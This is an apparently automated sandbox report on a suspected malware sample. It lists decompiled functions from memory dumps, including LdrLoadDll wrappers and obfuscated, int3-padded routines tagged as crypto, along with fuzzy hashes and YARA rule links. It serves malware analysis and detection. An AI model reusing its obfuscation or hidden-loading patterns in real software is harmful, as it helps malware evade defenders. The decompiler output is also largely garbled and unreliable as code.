Instruction ID: 6d9108f025a0daaf84588f91761baf46a4613dd7645499535b00fdf5ce75212c
Opcode Fuzzy Hash: 00d9af8ada967e92f08724f842517e3d5e3f1b979023ce9469ee702bd8b35524
Instruction Fuzzy Hash: 3E21D074609204EAC7156665C863FB637909B41329F60153FE9A3BE2F2C67C4487EB27

Uniqueness

Uniqueness Score: -1.00%

Function 004027ED, Relevance: 1.5, APIs: 1, Instructions: 49
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E004027ED(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				struct _OBJDIR_INFORMATION _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t9;
				long _t12;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;
				void* _t20;
				void* _t21;
				void* _t23;
				UNICODE_STRING* _t24;
				intOrPtr* _t25;
				intOrPtr* _t26;

				_t9 = 0x2824;
				_t18 =  *_t25;
				_t26 = _t25 + 4;
				E004012AB(_t9, _t16, _t18, _t20, _t21, _t23, __eflags);
				_t17 = _a4;
				_t24 =  &_v16;
				 *((intOrPtr*)(_a4 + 0xc))(_t24, _a8, 0x53);
				_t22 =  &_v8;
				_t12 = LdrLoadDll(0, 0, _t24,  &_v8);
				_t29 = _t12;
				if(_t12 != 0) {
					_v8 = 0;
				}
				_push(0x53);
				_t19 =  *_t26;
				E004012AB(0x2824, _t17, _t19, _t20, _t22, _t24, _t29);
				return _v8;
			}

0x00402800
0x00402812
0x00402815
0x0040281f
0x00402824
0x00402827
0x0040282e
0x00402831
0x0040283a
0x0040283d
0x0040283f
0x00402841
0x00402841
0x00402863
0x00402865
0x00402872
0x0040287e

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 0040283A

Memory Dump Source

Source File: 00000001.00000001.674621469.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 7b811dfe18a2fa04bac5265394d9a2456aa6afd5894524daffa0ad136d012fbe
Instruction ID: 86d1809ebd5855410281f38b9c9c6c09a144d2210cd9b7f1e60e22e0793f0f49
Opcode Fuzzy Hash: 7b811dfe18a2fa04bac5265394d9a2456aa6afd5894524daffa0ad136d012fbe
Instruction Fuzzy Hash: CD01D43BA08105E7D6007A818A4DF6A7724EB50744F20C137A6077A1C0C5FC9A07E7BB

Uniqueness

Uniqueness Score: -1.00%

Function 00402A5F, Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000001.674621469.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1b3552ac72063cde1dd00ed2533cd82601cb71c626973da629e3a6c7aca5fb4
Instruction ID: d2a5fe9c24ea9d40cb65b193c9e92e395b74c3bfc2bda7a921ea1112d3515fab
Opcode Fuzzy Hash: d1b3552ac72063cde1dd00ed2533cd82601cb71c626973da629e3a6c7aca5fb4
Instruction Fuzzy Hash: 53318E2190C1449EDB154FB0990D2A1BBB0DF56304B5508EFCA42BF8D3C5BCB447D657

Uniqueness

Uniqueness Score: -1.00%

Function 0040280A, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040280A(intOrPtr __ebx, HMODULE* __edi, UNICODE_STRING* __esi, void* __eflags) {
				void* __ebp;
				void* _t12;
				long _t15;
				intOrPtr _t18;
				intOrPtr _t19;
				void* _t20;
				UNICODE_STRING* _t23;
				void* _t25;
				intOrPtr* _t26;

				_t29 = __eflags;
				_t23 = __esi;
				_t21 = __edi;
				_t16 = __ebx;
				if(__eflags < 0) {
					if(__eflags >= 0) {
						__ecx = __ecx + 1;
						__eflags = __bl;
						_t12 = 0x2824;
					} else {
					}
					_t19 =  *_t26;
					_t26 = _t26 + 4;
					E004012AB(_t12, _t16, _t19, _t20, _t21, _t23, _t29);
					_t16 =  *((intOrPtr*)(_t25 + 8));
					_t23 = _t25 - 0xc;
					 *((intOrPtr*)( *((intOrPtr*)(_t25 + 8)) + 0xc))(_t23,  *((intOrPtr*)(_t25 + 0xc)), 0x53);
					_t21 = _t25 - 4;
					_t15 = LdrLoadDll(0, 0, _t23, _t25 - 4);
					_t30 = _t15;
					if(_t15 != 0) {
						 *(_t25 - 4) = 0;
					}
				}
				_push(0x53);
				_t18 =  *_t26;
				E004012AB(0x2824, _t16, _t18, _t20, _t21, _t23, _t30);
				return  *(_t25 - 4);
			}

0x0040280a
0x0040280a
0x0040280a
0x0040280a
0x0040280b
0x0040280d
0x00402803
0x00402804
0x00402800
0x0040280f
0x0040280f
0x00402812
0x00402815
0x0040281f
0x00402824
0x00402827
0x0040282e
0x00402831
0x0040283a
0x0040283d
0x0040283f
0x00402841
0x00402841
0x00402848
0x00402863
0x00402865
0x00402872
0x0040287e

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 0040283A

Memory Dump Source

Source File: 00000001.00000001.674621469.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 816e61236cf151029f9916b06356fa28e65bf4d83d8dd38ba6b14be9c999f240
Instruction ID: 9ca859c839910d9830ac79efeaa13c409ccf86f2f3a4ee59ee812277144ea7f3
Opcode Fuzzy Hash: 816e61236cf151029f9916b06356fa28e65bf4d83d8dd38ba6b14be9c999f240
Instruction Fuzzy Hash: B901843BA04105E7DA00BA819A4DBAE7764AB50704F10C57BE6077A1C5C6FC9607A76B

Uniqueness

Uniqueness Score: -1.00%

Function 0040281A, Relevance: 1.5, APIs: 1, Instructions: 38
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040281A(void* __eax, void* __ebx, void* __edi, void* __esi) {
				long _t12;
				intOrPtr _t19;
				intOrPtr _t20;
				void* _t21;
				UNICODE_STRING* _t26;
				void* _t28;
				intOrPtr* _t30;
				intOrPtr* _t31;
				void* _t34;

				_t34 = __eax - 0x90;
				_t19 =  *_t30;
				_t31 = _t30 + 4;
				E004012AB(__eax, __ebx, _t19, _t21, __edi, __esi, _t34);
				_t17 =  *((intOrPtr*)(_t28 + 8));
				_t26 = _t28 - 0xc;
				 *((intOrPtr*)( *((intOrPtr*)(_t28 + 8)) + 0xc))(_t26,  *((intOrPtr*)(_t28 + 0xc)), 0x53);
				_t23 = _t28 - 4;
				_t12 = LdrLoadDll(0, 0, _t26, _t28 - 4);
				_t35 = _t12;
				if(_t12 != 0) {
					 *(_t28 - 4) = 0;
				}
				_push(0x53);
				_t20 =  *_t31;
				E004012AB(0x2824, _t17, _t20, _t21, _t23, _t26, _t35);
				return  *(_t28 - 4);
			}

0x0040281a
0x00402812
0x00402815
0x0040281f
0x00402824
0x00402827
0x0040282e
0x00402831
0x0040283a
0x0040283d
0x0040283f
0x00402841
0x00402841
0x00402863
0x00402865
0x00402872
0x0040287e

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 0040283A

Memory Dump Source

Source File: 00000001.00000001.674621469.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: ef76625e9fce4a99ac1b5c6db449950ac3397aa5a53fee84dab980023b8c3a58
Instruction ID: 04be1964ae6a2c4a8d34668d02d656748d1177ed5934df91e255a91300bf99b4
Opcode Fuzzy Hash: ef76625e9fce4a99ac1b5c6db449950ac3397aa5a53fee84dab980023b8c3a58
Instruction Fuzzy Hash: 58F0A43AA04105D7DB00BA81CA49B9D7720AB51704F10C57BE6067A1C4C6B99707E76B

Uniqueness

Uniqueness Score: -1.00%

Function 0040281E, Relevance: 1.5, APIs: 1, Instructions: 33
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040281E(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				void* __edi;
				void* _t9;
				long _t12;
				intOrPtr _t20;
				void* _t21;
				void* _t22;
				UNICODE_STRING* _t26;
				void* _t28;
				intOrPtr* _t30;

				E004012AB(_t9, __ebx, __ecx, _t21, _t22, __esi, __eflags);
				_t17 =  *((intOrPtr*)(_t28 + 8));
				_t26 = _t28 - 0xc;
				 *((intOrPtr*)( *((intOrPtr*)(_t28 + 8)) + 0xc))(_t26,  *((intOrPtr*)(_t28 + 0xc)), _t22);
				_t23 = _t28 - 4;
				_t12 = LdrLoadDll(0, 0, _t26, _t28 - 4);
				_t34 = _t12;
				if(_t12 != 0) {
					 *(_t28 - 4) = 0;
				}
				_push(0x53);
				_t20 =  *_t30;
				E004012AB(0x2824, _t17, _t20, _t21, _t23, _t26, _t34);
				return  *(_t28 - 4);
			}

0x0040281f
0x00402824
0x00402827
0x0040282e
0x00402831
0x0040283a
0x0040283d
0x0040283f
0x00402841
0x00402841
0x00402863
0x00402865
0x00402872
0x0040287e

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 0040283A

Memory Dump Source

Source File: 00000001.00000001.674621469.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 65736493afcaf5b803b8217f4f0e2bcb43a663e8f28fff33dac9f311f6d1fd4a
Instruction ID: 3fd11184bcf92e870777245e351188805b8424fcd9c3dcde69815370b47807fd
Opcode Fuzzy Hash: 65736493afcaf5b803b8217f4f0e2bcb43a663e8f28fff33dac9f311f6d1fd4a
Instruction Fuzzy Hash: 9DF0303AA04105E7DB00BA91CA89B9E7770EB51714F10C16BE6067A1C4C6B89707E76B

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040250A, Relevance: 1.3, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

(3_\, xrefs: 00402527

Memory Dump Source

Source File: 00000001.00000002.733103599.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID: (3_\
API String ID: 0-1024548672
Opcode ID: 4a267a5a5f6b649a77e844de47957a3dbb9b510094ac05e3fc21bbb07d5a18e4
Instruction ID: 64c156a0781b3c67ba192cd992c8aad639144a23081a5c252ffbc859459b19b0
Opcode Fuzzy Hash: 4a267a5a5f6b649a77e844de47957a3dbb9b510094ac05e3fc21bbb07d5a18e4
Instruction Fuzzy Hash: 60113B7911520D6FE33C8A6995A00C2B796FF85608BA1284DD3818FE03C932B493CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00402A5F, Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.733103599.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adde1d8ed614f1b4627ac8248198af32a96e582f141dfd9e05361ae7fa8ad012
Instruction ID: 5be507c2b17a54e2dc63a842639e1fc389e25062d97b9bda01936e9eba1e708e
Opcode Fuzzy Hash: adde1d8ed614f1b4627ac8248198af32a96e582f141dfd9e05361ae7fa8ad012
Instruction Fuzzy Hash: 0031CE299444499ECB2D4BB0944A1D1BBA0DF5A304BA90DCBCB91BFCD7C974B483C793

Uniqueness

Uniqueness Score: -1.00%

Function 00402AB3, Relevance: .1, Instructions: 145
COMMONCrypto

Download Yara Rule

C-Code - Quality: 16%

			E00402AB3(void* __eax, signed int __ebx, void* __fp0) {
				signed int _t54;
				signed char _t65;
				void* _t66;
				void* _t70;
				void* _t71;
				void* _t73;
				signed int _t76;
				void* _t80;
				signed int _t82;
				signed int _t84;
				short _t85;
				void* _t88;
				void* _t89;
				void* _t90;
				void* _t93;
				void* _t95;
				void* _t96;
				void* _t98;
				signed int _t105;
				void* _t107;
				signed int _t117;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				signed int _t128;
				signed int _t129;
				signed int _t131;
				signed int _t135;
				void* _t146;
				void* _t154;

				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t120 = 0xfeccffcc;
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("lodsd");
				asm("int3");
				asm("int3");
				asm("movsd");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t88 = 0x20;
				asm("repne int3");
				 *(_t126 + 0x49333330) =  *(_t126 + 0x49333330) ^ 0xb9339adb;
				asm("sbb eax, 0x67cccccd");
				_t82 = __ebx |  *0xffcca0cc - 0x00000001;
				asm("daa");
				 *0xa9cca4cc =  *0xa9cca4cc - 0xffffffffb9339ada;
				_t154 = __fp0 -  *((intOrPtr*)(_t82 + 0x78));
				asm("stosd");
				asm("cmc");
				asm("int3");
				_t110 = 0xffffffffa9cca4cc;
				asm("enter 0x4fe8, 0x8");
				asm("enter 0xc927, 0xfe");
				_t105 = 0xffffffff88220080 *  *0xa9cca4cc >> 0x20;
				_t54 = 0xb9339adb *  *0xa9cca4cc;
				_t84 = (_t82 &  *(_t105 + 0x27)) >> 0xd7;
				_push(0xa9cca4cc);
				if(_t84 == 0) {
					asm("int3");
					asm("int3");
					asm("int3");
					asm("daa");
					_pop(_t131);
					_t105 = _t54 *  *(_t84 + 0x24b53927) >> 0x20;
					_t76 = _t54 *  *(_t84 + 0x24b53927);
					asm("scasb");
					_t125 = 0xfeccffcc -  *_t84;
					_t126 = _t131 ^ _t84;
					_t144 = _t126;
					asm("sidt [edi+0x680e5429]");
					if(_t126 > 0) {
						 *_t76 =  *_t76 + _t76;
						_pop(_t80);
						_t76 = E004012AB(_t80, _t84, 0x9a, _t105, 0xffffffffa9cca4cc, _t125, _t144);
						asm("invalid");
						asm("int3");
						asm("int3");
						asm("pushfd");
						_t110 = 0xffffffffa9cca4cb ^  *0x310424BB;
					}
					_t120 = _t125 ^  *_t84;
					_t88 = 0x3104241f;
					asm("int 0xcc");
				}
				asm("int3");
				asm("int3");
				_t89 = _t88 + 1;
				_t90 = _t89 - 1;
				asm("invalid");
				asm("int3");
				asm("int3");
				asm("std");
				asm("int 0xcc");
				asm("int3");
				_t93 = _t90 + 1;
				asm("cld");
				asm("int3");
				asm("int3");
				asm("pushfd");
				asm("salc");
				asm("int 0xcc");
				asm("int3");
				_t95 = _t93 - 1 + 1;
				_pop(_t135);
				asm("cld");
				asm("int3");
				asm("int3");
				asm("pushfd");
				_t117 = ((_t110 - 0x00000001 ^  *(_t89 + 0x317d243c) ^  *(_t90 + 0x3e132430)) - 0x00000001 ^  *(_t93 + 0x31462438)) - 0x00000001 ^  *(_t95 + 0x31bf2434);
				_t124 = _t120 ^  *_t84 ^  *_t84 ^  *_t84 ^  *_t84;
				_t96 = _t95 - 1;
				asm("iretd");
				asm("int 0xcc");
				asm("int3");
				asm("daa");
				asm("fisubr word [0xbaa4bd16]");
				asm("out 0xcc, eax");
				asm("int3");
				_t118 = _t117 + 1;
				asm("enter 0x4fe8, 0x8");
				asm("enter 0xc927, 0xb2");
				 *(_t117 + 1) =  *(_t117 + 1) ^ _t135;
				asm("in al, dx");
				asm("movsb");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("daa");
				_t128 = _t124;
				asm("sbb eax, 0xe23827fb");
				_t65 = _t126 & 0x00000057;
				_t107 = (_t105 &  *(_t96 - 0x7af53ed9)) -  *_t84;
				_t129 = _t128 ^ _t84;
				_t85 =  *0x68ecd704;
				_t146 = _t96 -  *((intOrPtr*)(_t65 + _t65));
				 *((intOrPtr*)(_t65 - 0x15)) =  *((intOrPtr*)(_t65 - 0x15)) + _t85;
				_t66 = _t65 + 0xf4eb2485;
				asm("in al, dx");
				E004012AB(_t66, _t85, 0xab, _t107, _t118, _t124, _t146);
				_push( *((intOrPtr*)(_t129 - 4)));
				L004019FC(_t107, _t118, _t124, _t146); // executed
				_push(_t85 + 0x3098);
				_push( *((intOrPtr*)(_t129 - 4)));
				_t70 = E00402601(_t107, _t146); // executed
				_t147 = _t70;
				if(_t70 != 0) {
					_t71 = E00401F45(_t85, _t107, _t118, _t124, _t147,  *((intOrPtr*)(_t129 - 4)));
					_t148 = _t71;
					if(_t71 != 0) {
						L18:
						_t152 = gs;
						if(gs != 0) {
							_t73 = _t85 + 0x537c;
							_t98 = 0x2e0e;
						} else {
							_t73 = _t85 + 0x30d8;
							_t98 = 0x22a4;
						}
						E00401962(_t98, _t154,  *((intOrPtr*)(_t129 - 4)), _t73, _t98,  *((intOrPtr*)(_t85 + 0x818a))); // executed
						_t70 = E004012AB(0x2c3a, _t85, 0xab, _t107, _t118, _t124, _t152);
					} else {
						_push( *((intOrPtr*)(_t129 - 4)));
						_t70 = L00402269(_t85, _t118, _t124, _t148); // executed
						_t149 = _t70;
						if(_t70 != 0) {
							_push( *((intOrPtr*)(_t129 - 4)));
							_t70 = L00402339(_t85, _t107, _t118, _t124, _t149); // executed
							_t150 = _t70;
							if(_t70 != 0) {
								_push( *((intOrPtr*)(_t129 - 4)));
								_t70 = E00402000(_t85, _t118, _t124, _t150, _t154); // executed
								if(_t70 != 0) {
									goto L18;
								}
							}
						}
					}
				}
				return _t70;
			}

0x00402ab8
0x00402abe
0x00402ac1
0x00402ac2
0x00402ac8
0x00402ac9
0x00402ace
0x00402acf
0x00402ad0
0x00402ad1
0x00402ad2
0x00402ad3
0x00402ad4
0x00402ad5
0x00402ad6
0x00402ade
0x00402adf
0x00402ae0
0x00402ae5
0x00402ae6
0x00402aec
0x00402af2
0x00402af5
0x00402af6
0x00402af7
0x00402af8
0x00402af9
0x00402afc
0x00402aff
0x00402b06
0x00402b10
0x00402b16
0x00402b18
0x00402b19
0x00402b1b
0x00402b1e
0x00402b1f
0x00402b25
0x00402b26
0x00402b27
0x00402b2b
0x00402b2f
0x00402b2f
0x00402b34
0x00402b37
0x00402b38
0x00402b3a
0x00402b3b
0x00402b3c
0x00402b3d
0x00402b3e
0x00402b3f
0x00402b3f
0x00402b45
0x00402b46
0x00402b48
0x00402b48
0x00402b4a
0x00402b51
0x00402b53
0x00402b55
0x00402b71
0x00402b78
0x00402b7a
0x00402b7b
0x00402b7c
0x00402b7d
0x00402b7d
0x00402b83
0x00402b85
0x00402b8a
0x00402b8a
0x00402b8b
0x00402b8c
0x00402b8d
0x00402b9c
0x00402ba0
0x00402ba2
0x00402ba3
0x00402bb0
0x00402bb1
0x00402bb3
0x00402bb4
0x00402bb7
0x00402bb8
0x00402bb9
0x00402bba
0x00402bc7
0x00402bc8
0x00402bca
0x00402bcb
0x00402bcd
0x00402bce
0x00402bcf
0x00402bd0
0x00402bd1
0x00402bd2
0x00402bd8
0x00402bda
0x00402bde
0x00402bdf
0x00402be1
0x00402be2
0x00402be3
0x00402be9
0x00402beb
0x00402bec
0x00402bed
0x00402bf1
0x00402bf5
0x00402bfd
0x00402bfe
0x00402c00
0x00402c01
0x00402c02
0x00402c04
0x00402c05
0x00402c06
0x00402c0b
0x00402c0d
0x00402c0f
0x00402c11
0x00402c18
0x00402c1b
0x00402c1e
0x00402c23
0x00402c35
0x00402c3a
0x00402c3d
0x00402c48
0x00402c49
0x00402c4c
0x00402c51
0x00402c53
0x00402c5c
0x00402c61
0x00402c63
0x00402c89
0x00402c8c
0x00402c8f
0x00402c9e
0x00402ca4
0x00402c91
0x00402c91
0x00402c97
0x00402c97
0x00402cb4
0x00402ce0
0x00402c65
0x00402c65
0x00402c68
0x00402c6d
0x00402c6f
0x00402c71
0x00402c74
0x00402c79
0x00402c7b
0x00402c7d
0x00402c80
0x00402c87
0x00000000
0x00000000
0x00402c87
0x00402c7b
0x00402c6f
0x00402c63
0x00402ce6

Memory Dump Source

Source File: 00000001.00000002.733103599.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf526be089bbf4f567823773968cea02f6975f775f586de3c71f4e573fc0c6e7
Instruction ID: ee94f92266ba9be288bfed2233454c816de7546f4ab939652c09e43866b9b785
Opcode Fuzzy Hash: cf526be089bbf4f567823773968cea02f6975f775f586de3c71f4e573fc0c6e7
Instruction Fuzzy Hash: 63317A2991085D9BCB2D4B75905C191B7A4DF5E308FB60D8ACB91BFD97CA34B843C293

Uniqueness

Uniqueness Score: -1.00%

Function 00402B2E, Relevance: .1, Instructions: 82
COMMONCrypto

Download Yara Rule

C-Code - Quality: 15%

			E00402B2E(signed int __ebx, signed int __edx, void* __edi, signed int __esi) {
				intOrPtr _t18;
				void* _t20;
				signed char _t35;
				void* _t36;
				signed int _t37;
				signed char _t40;
				void* _t58;
				void* _t59;
				signed int _t69;
				signed int _t72;
				signed int _t80;
				intOrPtr* _t84;
				signed int _t87;
				void* _t88;
				signed char _t89;
				void* _t90;

				_t59 = __edi;
				_t40 = __ebx ^  *__edx;
				_t89 = _t40;
				_push(0x2aac);
				_t18 =  *_t84;
				E004012AB(_t18, _t40, 0x9d, __edx, __edi, __esi, _t89);
				_t20 = 0x2b76;
				 *0x4cb1e20 = __eflags <= 0;
				__eflags =  *0x4cb1e20;
				E004012AB(_t20, _t40, 0x9a, __edx, _t59, __esi, _t89);
				asm("invalid");
				asm("int3");
				asm("int3");
				asm("pushfd");
				asm("int 0xcc");
				asm("int3");
				asm("invalid");
				asm("int3");
				asm("int3");
				asm("std");
				asm("int 0xcc");
				asm("int3");
				asm("cld");
				asm("int3");
				asm("int3");
				asm("pushfd");
				asm("salc");
				asm("int 0xcc");
				asm("int3");
				_pop(_t87);
				asm("cld");
				asm("int3");
				asm("int3");
				asm("pushfd");
				_t78 = __esi ^  *_t40 ^  *_t40 ^  *_t40 ^  *_t40 ^  *_t40;
				asm("iretd");
				asm("int 0xcc");
				asm("int3");
				asm("daa");
				asm("fisubr word [0xbaa4bd16]");
				asm("out 0xcc, eax");
				asm("int3");
				_t69 = ((((_t59 - 0x00000001 ^  *0x310424BA) - 0x00000001 ^  *0x317D24D6 ^  *0x3E1324CA) - 0x00000001 ^  *0x314624D2) - 0x00000001 ^  *0x31BF24CE) + 1;
				asm("enter 0x4fe8, 0x8");
				asm("enter 0xc927, 0xb2");
				 *_t69 =  *_t69 ^ _t87;
				asm("in al, dx");
				asm("movsb");
				_push(__esi ^  *_t40 ^  *_t40 ^  *_t40 ^  *_t40 ^  *_t40);
				asm("int3");
				asm("int3");
				asm("int3");
				asm("daa");
				_t88 = (((( *0x9cccccfc | 0x000000c3) - 0x00000001 | 0x000000c3) - 0x00000001 | 0x000000c3) - 0x00000001 | 0x000000c3) - 1;
				asm("sbb eax, 0xe23827fb");
				_t35 = _t80 & 0x00000057;
				_t58 = (__edx &  *0xFFFFFFFF850AC1BF) -  *_t40;
				_t41 =  *0x68ecd704;
				_t90 = 0x98 -  *((intOrPtr*)(_t35 + _t35));
				 *((intOrPtr*)(_t35 - 0x15)) =  *((intOrPtr*)(_t35 - 0x15)) +  *0x68ecd704;
				_t36 = _t35 + 0xf4eb2485;
				asm("in al, dx");
				_t37 = E004012AB(_t36, _t41, 0xab, _t58, _t69, _t78, _t90);
				_push(_t88);
				asm("cld");
				asm("int3");
				asm("int3");
				asm("pushfd");
				_t72 = (_t69 ^  *0x217624DB) - 0x00000001 ^  *0x357C24DC;
				 *(_t88 + _t72 * 2) =  *(_t88 + _t72 * 2) ^ _t37;
				return _t37 ^ 0x0c493333;
			}

0x00402b2e
0x00402b2e
0x00402b2e
0x00402b21
0x00402b26
0x00402b44
0x00402b55
0x00402b5e
0x00402b5e
0x00402b71
0x00402b78
0x00402b7a
0x00402b7b
0x00402b7c
0x00402b8a
0x00402b8c
0x00402ba0
0x00402ba2
0x00402ba3
0x00402bb0
0x00402bb1
0x00402bb3
0x00402bb7
0x00402bb8
0x00402bb9
0x00402bba
0x00402bc7
0x00402bc8
0x00402bca
0x00402bcd
0x00402bce
0x00402bcf
0x00402bd0
0x00402bd1
0x00402bd8
0x00402bde
0x00402bdf
0x00402be1
0x00402be2
0x00402be3
0x00402be9
0x00402beb
0x00402bec
0x00402bed
0x00402bf1
0x00402bf5
0x00402bfd
0x00402bfe
0x00402bff
0x00402c00
0x00402c01
0x00402c02
0x00402c04
0x00402c05
0x00402c06
0x00402c0b
0x00402c0d
0x00402c11
0x00402c18
0x00402c1b
0x00402c1e
0x00402c23
0x00402c35
0x00402c44
0x00402c45
0x00402c46
0x00402c47
0x00402c48
0x00402c49
0x00402c4b
0x00402c53

Memory Dump Source

Source File: 00000001.00000001.674621469.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6eca614466f42959adfb9f10f2db979fbb91015b56faf0f4599ba219af7598af
Instruction ID: 684b41897123f41a9c3872b955343c57b06afb2bc11434f45a4465868e347c5a
Opcode Fuzzy Hash: 6eca614466f42959adfb9f10f2db979fbb91015b56faf0f4599ba219af7598af
Instruction Fuzzy Hash: 0711C421608418DACB185F7191086A2F3B1EF5A304BA209ABDB02BFCD3C9BC7847D547

Uniqueness

Uniqueness Score: -1.00%

Function 00402000, Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.733103599.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79ea8fd425b2c888051b2e809439338920840858330f0444cb6eb141cff5550f
Instruction ID: abc276a2ba0a36a85ab5b5df61cf416fa3bc2d73c79843c5fd07df71a10c5fed
Opcode Fuzzy Hash: 79ea8fd425b2c888051b2e809439338920840858330f0444cb6eb141cff5550f
Instruction Fuzzy Hash: 3A012B7400430CBED2289660D589453BBA8FBC1344F601D2EC3423BCE2C979B857D697

Uniqueness

Uniqueness Score: -1.00%

Function 00402000, Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000001.674621469.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79ea8fd425b2c888051b2e809439338920840858330f0444cb6eb141cff5550f
Instruction ID: abc276a2ba0a36a85ab5b5df61cf416fa3bc2d73c79843c5fd07df71a10c5fed
Opcode Fuzzy Hash: 79ea8fd425b2c888051b2e809439338920840858330f0444cb6eb141cff5550f
Instruction Fuzzy Hash: 3A012B7400430CBED2289660D589453BBA8FBC1344F601D2EC3423BCE2C979B857D697

Uniqueness

Uniqueness Score: -1.00%

Function 00402491, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.733103599.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36c7c2ea362ab175c8faec48889e7f9c448137358fc225cecc8bd01fb5f49981
Instruction ID: 0d435e3da4236d765e4c301cf304dd2dd2fe2570b998ddab2789a7de4284b15f
Opcode Fuzzy Hash: 36c7c2ea362ab175c8faec48889e7f9c448137358fc225cecc8bd01fb5f49981
Instruction Fuzzy Hash: 1001A27800265CAB972DCAA5D5D9041FFA9EE06330FA8EC8DC7824FD42CEB57086C643

Uniqueness

Uniqueness Score: -1.00%

Function 0040201A, Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.733103599.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50abe3c5d8af24f71ceee97d10064826831867a7979f46442cde13a65a6779ae
Instruction ID: 7ec0170f8d63d1cb41ea52610257a3a2e440b84d0ce0a50aa0c143b35ceb2a17
Opcode Fuzzy Hash: 50abe3c5d8af24f71ceee97d10064826831867a7979f46442cde13a65a6779ae
Instruction Fuzzy Hash: 26F0C87410020D6ED22CD7A0D185052B7A4FFC1304F611D5DC3422BCA2C939B853DA83

Uniqueness

Uniqueness Score: -1.00%

Function 0040201E, Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.733103599.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 348556ee60875952d1b353ddc5f2ef97f6264277c173934fb5a6c0ffb2736ff7
Instruction ID: a43892d0f1fc751e2312f163d4b39de440685b5976e97a52a0fb587587c89ddc
Opcode Fuzzy Hash: 348556ee60875952d1b353ddc5f2ef97f6264277c173934fb5a6c0ffb2736ff7
Instruction Fuzzy Hash: 32F0AF7400424D6E93299B719585092BBA4FF82304F611D8EC3825BC62CA3AB893CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0040202D, Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.733103599.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91acaab0455c819429546f4fe30140ad69fd9360310cbf4e3092104b92557cb0
Instruction ID: d517fed31536b1fc2a21567abd7de147b63b6840b6cf7dc9692091a0263e9a5e
Opcode Fuzzy Hash: 91acaab0455c819429546f4fe30140ad69fd9360310cbf4e3092104b92557cb0
Instruction Fuzzy Hash: D4F0C27410421DAE926CDBA0D185092BBA4FFD2304F615D5DC3426BCA2CA3AF853DA82

Uniqueness

Uniqueness Score: -1.00%

Function 00402084, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.733103599.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2fd54db6ca68966c6ea549734bc74dc57af9ffe16b4078303ef16f8b7efa8fb
Instruction ID: b234b1e164d4dd428b17fdfb9b1103a254be6e4ce54d4f1e89fdf23064b212e5
